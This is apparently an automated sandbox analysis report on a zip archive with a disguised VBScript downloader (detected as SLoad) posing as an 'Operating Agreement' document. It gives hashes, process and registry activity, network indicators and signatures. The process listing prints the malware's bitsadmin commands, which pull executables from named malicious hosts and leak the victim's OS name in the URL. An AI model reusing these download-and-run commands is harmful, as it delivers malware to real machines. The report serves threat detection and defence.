analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Operating Agreement 051419a30.zip

Full analysis: https://app.any.run/tasks/567f8d78-34c8-40b7-90ab-878fbb7fa4c1
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: May 15, 2019, 07:49:03
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
loader
trojan
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract
MD5:

0E912CCE4B9F5C8D4BC796BEC60F0625

SHA1:

9122D26BD0F0218E7E5E5C0A5198BE763BADE07A

SHA256:

F9F05297BAE713B2151C95BD2D5A7A5FD31201F9FA2B1470D010223DFD4321DE

SSDEEP:

96:u3bDK9L855d2eOWwdOdkK9wl6XEDz0p0HJ+7P+Eoj:urW9CnfObOdN0gEDzpHJ+7mtj

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Uses BITADMIN.EXE for downloading application

      • WScript.exe (PID: 3680)
      • WScript.exe (PID: 2120)
  • SUSPICIOUS

    • Executes scripts

      • WinRAR.exe (PID: 3984)
  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipFileName: Operating Agreement 051419a30.doc.vbs
ZipUncompressedSize: 10004
ZipCompressedSize: 4206
ZipCRC: 0x88a972d8
ZipModifyDate: 2019:05:14 19:49:15
ZipCompression: Deflated
ZipBitFlag: -
ZipRequiredVersion: 20
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
56
Monitored processes
11
Malicious processes
0
Suspicious processes
3

Behavior graph

Click at the process to see the details
start winrar.exe no specs wscript.exe no specs wmic.exe no specs bitsadmin.exe no specs bitsadmin.exe no specs bitsadmin.exe no specs wscript.exe no specs wmic.exe no specs bitsadmin.exe no specs bitsadmin.exe no specs bitsadmin.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3984"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\Desktop\Operating Agreement 051419a30.zip"C:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Exit code:
0
Version:
5.60.0
2120"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\Rar$DIa3984.7826\Operating Agreement 051419a30.doc.vbs" C:\Windows\System32\WScript.exeWinRAR.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
3140wmic OS get Caption /valueC:\Windows\System32\Wbem\wmic.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
WMI Commandline Utility
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2920"C:\Windows\System32\bitsadmin.exe" /transfer qcxjb43 /Priority HIGH http://type.tastywieners.com/narcissist.png?bg=sp40&os=TWljcm9zb2Z0IFdpbmRvd3MgNyBQcm9mZXNzaW9uYWwgDQ0KDQ0KDQ0KDQ0K&av= C:\Users\admin\AppData\Local\Temp\84931778.49.exeC:\Windows\System32\bitsadmin.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
BITS administration utility
Exit code:
2149580817
Version:
7.5.7600.16385 (win7_rtm.090713-1255)
560"C:\Windows\System32\bitsadmin.exe" /transfer qcxjb15 /Priority HIGH http://shirts.tastywienersonwheels.com/zealous.png?bg=sp40&os=TWljcm9zb2Z0IFdpbmRvd3MgNyBQcm9mZXNzaW9uYWwgDQ0KDQ0KDQ0KDQ0K&av= C:\Users\admin\AppData\Local\Temp\84931778.49.exeC:\Windows\System32\bitsadmin.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
BITS administration utility
Exit code:
2149580817
Version:
7.5.7600.16385 (win7_rtm.090713-1255)
3856"C:\Windows\System32\bitsadmin.exe" /transfer qcxjb23 /Priority HIGH http://dendy.oshkoshrugby.org/brusque.png?bg=sp40&os=TWljcm9zb2Z0IFdpbmRvd3MgNyBQcm9mZXNzaW9uYWwgDQ0KDQ0KDQ0KDQ0K&av= C:\Users\admin\AppData\Local\Temp\84931778.49.exeC:\Windows\System32\bitsadmin.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
BITS administration utility
Exit code:
2149580817
Version:
7.5.7600.16385 (win7_rtm.090713-1255)
3680"C:\Windows\System32\WScript.exe" "C:\Users\admin\Desktop\Operating Agreement 051419a30.doc.vbs" C:\Windows\System32\WScript.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
2640wmic OS get Caption /valueC:\Windows\System32\Wbem\wmic.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
WMI Commandline Utility
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2788"C:\Windows\System32\bitsadmin.exe" /transfer qcxjb44 /Priority HIGH http://type.tastywieners.com/narcissist.png?bg=sp40&os=TWljcm9zb2Z0IFdpbmRvd3MgNyBQcm9mZXNzaW9uYWwgDQ0KDQ0KDQ0KDQ0K&av= C:\Users\admin\AppData\Local\Temp\85131898.33.exeC:\Windows\System32\bitsadmin.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
BITS administration utility
Exit code:
2149580817
Version:
7.5.7600.16385 (win7_rtm.090713-1255)
3948"C:\Windows\System32\bitsadmin.exe" /transfer qcxjb45 /Priority HIGH http://shirts.tastywienersonwheels.com/zealous.png?bg=sp40&os=TWljcm9zb2Z0IFdpbmRvd3MgNyBQcm9mZXNzaW9uYWwgDQ0KDQ0KDQ0KDQ0K&av= C:\Users\admin\AppData\Local\Temp\85131898.33.exeC:\Windows\System32\bitsadmin.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
BITS administration utility
Exit code:
2149580817
Version:
7.5.7600.16385 (win7_rtm.090713-1255)
Total events
688
Read events
653
Write events
35
Delete events
0

Modification events

(PID) Process:(3984) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
Operation:writeName:ShellExtBMP
Value:
(PID) Process:(3984) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
Operation:writeName:ShellExtIcon
Value:
(PID) Process:(3984) WinRAR.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
(PID) Process:(3984) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:0
Value:
C:\Users\admin\Desktop\Operating Agreement 051419a30.zip
(PID) Process:(3984) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:name
Value:
120
(PID) Process:(3984) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:size
Value:
80
(PID) Process:(3984) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:type
Value:
120
(PID) Process:(3984) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:mtime
Value:
100
(PID) Process:(3984) WinRAR.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
Operation:writeName:@C:\Windows\System32\wshext.dll,-4802
Value:
VBScript Script File
(PID) Process:(3984) WinRAR.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
Executable files
0
Suspicious files
0
Text files
2
Unknown types
0

Dropped files

PID
Process
Filename
Type
3984WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DIa3984.7826\Operating Agreement 051419a30.doc.vbstext
MD5:D8ABE28212CBFC4D14CA4B7CDBEFD62C
SHA256:BFA0486AAF80C057679F26DF110118774E17B141E6B7D80BD6B1089801F39212
3984WinRAR.exeC:\Users\admin\Desktop\Operating Agreement 051419a30.doc.vbstext
MD5:D8ABE28212CBFC4D14CA4B7CDBEFD62C
SHA256:BFA0486AAF80C057679F26DF110118774E17B141E6B7D80BD6B1089801F39212
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
6
TCP/UDP connections
6
DNS requests
4
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
HEAD
200
192.186.224.8:80
http://type.tastywieners.com/narcissist.png?bg=sp40&os=TWljcm9zb2Z0IFdpbmRvd3MgNyBQcm9mZXNzaW9uYWwgDQ0KDQ0KDQ0KDQ0K&av=
US
malicious
HEAD
200
192.185.41.190:80
http://shirts.tastywienersonwheels.com/zealous.png?bg=sp40&os=TWljcm9zb2Z0IFdpbmRvd3MgNyBQcm9mZXNzaW9uYWwgDQ0KDQ0KDQ0KDQ0K&av=
US
malicious
HEAD
200
192.185.41.190:80
http://shirts.tastywienersonwheels.com/zealous.png?bg=sp40&os=TWljcm9zb2Z0IFdpbmRvd3MgNyBQcm9mZXNzaW9uYWwgDQ0KDQ0KDQ0KDQ0K&av=
US
malicious
HEAD
200
192.186.224.8:80
http://dendy.oshkoshrugby.org/brusque.png?bg=sp40&os=TWljcm9zb2Z0IFdpbmRvd3MgNyBQcm9mZXNzaW9uYWwgDQ0KDQ0KDQ0KDQ0K&av=
US
malicious
HEAD
200
192.186.224.8:80
http://type.tastywieners.com/narcissist.png?bg=sp40&os=TWljcm9zb2Z0IFdpbmRvd3MgNyBQcm9mZXNzaW9uYWwgDQ0KDQ0KDQ0KDQ0K&av=
US
malicious
HEAD
200
192.186.224.8:80
http://dendy.oshkoshrugby.org/brusque.png?bg=sp40&os=TWljcm9zb2Z0IFdpbmRvd3MgNyBQcm9mZXNzaW9uYWwgDQ0KDQ0KDQ0KDQ0K&av=
US
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
192.186.224.8:80
type.tastywieners.com
GoDaddy.com, LLC
US
malicious
192.185.41.190:80
shirts.tastywienersonwheels.com
CyrusOne LLC
US
suspicious

DNS requests

Domain
IP
Reputation
type.tastywieners.com
  • 192.186.224.8
malicious
shirts.tastywienersonwheels.com
  • 192.185.41.190
malicious
dendy.oshkoshrugby.org
  • 192.186.224.8
malicious

Threats

PID
Process
Class
Message
A Network Trojan was detected
MALWARE [PTsecurity] Trojan-Downloader.VBS.SLoad.gen
A Network Trojan was detected
MALWARE [PTsecurity] Trojan-Downloader.VBS.SLoad.gen
A Network Trojan was detected
MALWARE [PTsecurity] Trojan-Downloader.VBS.SLoad.gen
A Network Trojan was detected
MALWARE [PTsecurity] Trojan-Downloader.VBS.SLoad.gen
A Network Trojan was detected
MALWARE [PTsecurity] Trojan-Downloader.VBS.SLoad.gen
A Network Trojan was detected
MALWARE [PTsecurity] Trojan-Downloader.VBS.SLoad.gen
12 ETPRO signatures available at the full report
No debug info